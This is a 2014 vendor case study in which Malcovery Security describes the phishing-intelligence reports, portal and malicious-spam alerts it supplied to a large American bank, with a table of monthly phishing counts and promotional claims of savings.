MALCOVERY
S E C U R I T Y
How a Major Bank Battled its Phishing:
A Real World Case Study
January 2014
© Copyright 2014 Malcovery Security, LLC. All rights reserved.
MALCOVERY
S E C U R I T Y
Background
Results Delivered
The Major American Bank Corporation (MAB) is a
multinational banking and financial services corporation
headquartered in the Southeastern United States. It is one of
the largest bank holding companies in the United States by
assets. The bank has made acquisitions over the past 5 to 7
years making it one of the world’s largest wealth management
corporations and a major player in the investment banking
market.
Table 1 provides a summary of the volume of data reported
to MAB.
Despite layers of security technology and tools, including
security awareness and training for employees, web and email
client filters, web gateway blacklists, implementing standards
such as DMARC, and employing the use of takedown services
(internally or externally), the phishing and malicious spam
problem has grown – and has become even more successful.
While all industries are subject to phishing over 20 percent of
phishing attacks target financial institutions. It’s no surprise
that banking and financial institutions have increasingly
attracted unwanted criminal attention. When attacking banks
and their users, cybercriminals go right to the money -- their
main motivation.
MAB and Malcovery
After an initial evaluation period, Malcovery entered into a
contract with MAB for phishing intelligence services, including
monthly intelligence reports called Phishing Intelligence
Report™, and access to Malcovery’s portal of intelligence
regarding ‘credential phishing web sites,’ called PhishIQ™.
Like many companies, and particularly financial institutions,
MAB experiences millions of dollars of losses each year due
to phishing. During its engagement with MAB, Malcovery
demonstrated how its alignment with the bank’s three-tiered
approach to phishing – incorporating pro-active and reactive
measures with intelligence – could significantly reduce these
losses. The intelligence provided by Malcovery is estimated
to have enabled a savings for MAB of $2 million, for an
excellent return of 800%.
Malcovery delivered to MAB the most thorough and timely
intelligence available anywhere about phishing. That is,
detailed monthly reports were prepared by a threat
intelligence team that included a Malcovery analyst working
with MAB. These reports not only outlined statistics on
hundreds of phishing web sites targeting MAB’s customers
each month, but they also guided the bank in how to prioritize
its investigative actions and mitigation efforts. Each monthly
report provided an in-depth analysis about each of the
five largest phishing clusters identified that month, along
with spotlighting any new criminals and criminal methods
identified.
December 201X
January 201X
February 201X
March 201X
April 201X
May 201X
June 201X
July 201X
August 201X
September 201X
October 201X
November 201X
Total:
PHISHING
ATTACKS
# WITH
KITS
UNIQUE CRIMINAL
EMAIL ADDRESSES
554
167
162
789
254
50
516
190
30
146
6
15
169
16
15
957
3
6
74
6
10
1,076
289
172
214
81
140
461
149
176
520
166
214
678
89
214
6,154
1,416
1,204
Table 1 Summary of Phishing Data Reported to MAB
The most important numbers in Table 1 are the 6,154
phishing attacks that targeted MAB and the 1,204 drop
email addresses identified in the criminal toolkits. A high
volume of phishing attacks not only points to high losses
among consumers but also to the amount of forensic data
that Malcovery analyzes for MAB. The more live phishing
attacks that can be identified, the more forensic data there is
to manipulate and find clues from correlation among attacks
and from the inevitable mistakes that criminals make.
Case Study / January 2014
© Copyright 2014 Malcovery Security, LLC. All rights reserved.
2
MALCOVERY
S E C U R I T Y
Malcovery also provided for up to twelve phishing
investigative reports. MAB made requests that Malcovery
responded to with detailed reports based on its process
called The Seven Phases of Phishing Investigation.
These reports were highly-detailed exposés that each focused
on a large or interesting phishing attack from the previous
month, with the goal of identifying and communicating
to MAB the underlying patterns within the massive amounts
of forensic data about the attacks. These patterns often
included a range of IP addresses, components of the phishing
web site Internet addresses (URL), a set of domain names, or a
set of criminal email addresses. The patterns recognized were
used to recommend specific actions for the bank, including
actions such as initiating subpoenas to Internet Service
Providers and looking further into the bank’s own computer
logs for additional information about the phishing attack.
Malcovery staffers have become familiar with the “look and
feel” of all types of MAB phishing sites and have kept detailed
records so that they could notify the bank’s representatives
of any new actionable intelligence. Throughout the year, they
sent email notifications to bank representatives whenever
stolen credential lists, known as drop files, were identified.
Malcovery also provided access for MAB representatives to its
PhishIQ™ portal. The portal provides the most timely, complete,
and convenient access for MAB to data about phishing web
sites targeting the bank. During the year, Malcovery added a
significant number of new features to the portal and enhanced
the load and search times of the web interface. Some new
features included the addition of screenshots of the main
phishing pages, the ability to search on drop email addresses,
and the option to export data to a CSV file.
Finally, Malcovery started processing the MAB Abuse Box.
This means that the bank forwarded to Malcovery all of the
bank’s employees’ and customers’ email messages regarding
suspected online fraud so that Malcovery could extract
phishing web site addresses, process them, and add them
to the Malcovery phishing data mine. Prior to directing the
Abuse Box messages to Malcovery, the bank did not have
the capacity to read and analyze each message received
externally. Malcovery’s Automated processing provides a
quicker response time so that MAB knows which messages
concern phishing and which may be part of a malicious spam
campaign. The Abuse Box is also a rich feed of phishing URLs
that get correlated with Malcovery’s other sources of phishing
attack data.
T3: Additional Intelligence Regarding
Email-Based Threats
In response to the growing incidence of malicious spam over
and above credential phishing, Malcovery built Today’s Top
Threats (T3) from a threat alerting system that was known in
its infancy at the University of Alabama at Birmingham (UAB)
as Emerging Threats by Email. T3 identifies the most prolific
malicious spam campaigns each day and delivers intelligence
about them via emailed reports and via XML-formatted,
machine-consumable files on Malcovery’s secure website.
Recently Malcovery announced support for the STIX
Threat Intelligence format for this data.
Malicious spam reaches tens of millions of email users
every day, with the goal of commandeering the user’s device
through the delivery of either (1) malware as an attachment to
a convincing email message spoofing one of over 100 wellknown brands, or (2) a link to customized malware enabled by
criminal exploit kits such as Blackhole.
The most common payload of malicious spam campaigns
is the Zeus Banking Trojan, which can take over control of
the victim’s computer and steal online banking credentials,
among other PII (Personally Identifiable Information). As one of
the largest banks in the country, MAB is a leader in protecting
consumers from this growing menace by performing realtime, cross-channel fraud detection. With the intelligence
provided in daily T3 reports, the bank is enabled to protect
its own employees and networks and to further reduce fraud
losses from email-based threats.
Singularity of Capabilities
and Offerings
Malcovery’s database was initially built on data that was
collected at the University of Alabama at Birmingham (UAB)
starting in 2007. Due to the quantity of data collected and to
the innovations of its researchers, UAB is at the forefront of all
research universities worldwide in understanding this vector
of fraud and how to mitigate it. An estimated $2.8 million
was invested by the university to establish its state-of-theart anti-phishing technology. Additionally, UAB leaders formed
and nourished relationships with other interested parties in
commerce and law enforcement—such as the Anti-Phishing
Working Group, the Federal Bureau of Investigation, and the
Financial Services Information Sharing and Analysis Center–
so that the intelligence amassed at UAB about phishing is
unparalleled.
Case Study / January 2014
© Copyright 2014 Malcovery Security, LLC. All rights reserved.
3
MALCOVERY
S E C U R I T Y
Due to these unique relationships and others, UAB was
identifying more phishing sites than all other sources
combined, and, more significantly, developed [now patented]
computer software that could automatically identify the
targeted brand associated with suspected phishing web sites
and extract forensic evidence about phishing criminals.
The bottom line? Malcovery’s services support the bank’s
bottom line, not only by reducing phishing fraud losses but
also by reducing personnel expenses and takedown costs,
improving the efficiency and efficacy of investigations, and
protecting the bank’s valuable brands by enhancing trust
among its stakeholders.
At the start of the contract with MAB, Malcovery licensed this
historical data and the processes from UAB and has since
expanded on and improved the collection and identification of
phishing sites and the storage, manipulation, and analysis of
the related intelligence.
Contact:
Malcovery’s turnkey phishing data collection processes do
more than just identify a web site as a phishing web site
targeting a brand. Although not a standard practice in the
phishing takedown industry, it is essential to collect and
store in a forensically-sound manner all the Internet files
that are used to create phishing web sites. One component
of these processes involves the automated extraction of
criminal email addresses. While some of the email addresses
are fairly easy to identify, many of them are obfuscated, or
hidden, using encryption or other means of manipulating
code so that it is hard for humans to find the email addresses.
Malcovery automatically de-obfuscates eight different tricks
of the criminals’ trade. It is this software that, along with
the patented software that identifies the targeted brand of
a suspected phishing web site, forms the basis for Seven
Phases of Phishing Investigation and enables the successful
and crucial prioritization of investigations. By being able to
associate one criminal or criminal gang to a set of thousands
of phishing web sites, the process eliminates what those in
the phishing takedown industry refer to as Whac-a-Mole.
Corporate and Development Office:
Malcovery Security, LLC
2400 Oxford Drive #302
Bethel Park, PA 15102
Phone: 855-625-2683
Email: [email protected]
Twitter: @malcovery
Facebook: Malcovery
LinkedIn: Malcovery
Website: www.malcovery.com
Google+: Malcovery
Blog: http://www.malcovery.com/blog/
Research Office:
Malcovery Security, LLC
1500 First Avenue North Suite 83
Birmingham, AL 35203
Conclusion
In summary, all of these phishing services provided by
Malcovery come together to identify phishing criminal activity
through a nexus of very large amounts of archived data
that includes IP addresses, phishing kit details, association
to other phishing web sites, and comparison to similar web
sites attacking other brands. Experience has shown that
such extensive data is needed in order to support the large
phishing investigations that have resulted from banks such as
MAB, and their commitment to fighting phishing. The team of
professionals that has been assembled at Malcovery provides
in-depth knowledge of phishing attacks against MAB. This
knowledge has become invaluable to MAB as it continues to
combat fraud and other e-mail-based threats.
Case Study / January 2014
© Copyright 2014 Malcovery Security, LLC. All rights reserved.
4